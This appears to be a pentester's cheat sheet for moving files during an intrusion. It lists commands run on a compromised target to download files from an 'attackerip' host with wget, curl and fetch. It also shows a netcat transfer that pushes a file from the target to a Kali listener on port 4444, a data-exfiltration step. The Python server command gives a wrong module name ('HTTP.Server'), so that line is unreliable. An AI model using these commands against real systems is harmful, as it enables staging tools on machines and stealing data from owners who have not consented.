Python HTTPServer

#on Attacker
python -m HTTP.Server <portNo>

#on target
wget <attackerip>:<portNo>/filename


*******************************************************************************************

Apache

#on Attacker
cp <filenamr> /var/www/html
service apache2 start

#on target
wget http://attackerip/file
curl http://attackerip/file > file
fetch http://attackerip/file       

*******************************************************************************************

Netcat (From Target to Kali)

# Listen on Kali
nc -lvp 4444 > <fileName>

# Send from Target machine
nc <kali_ip> 4444 < <fileName>

*******************************************************************************************


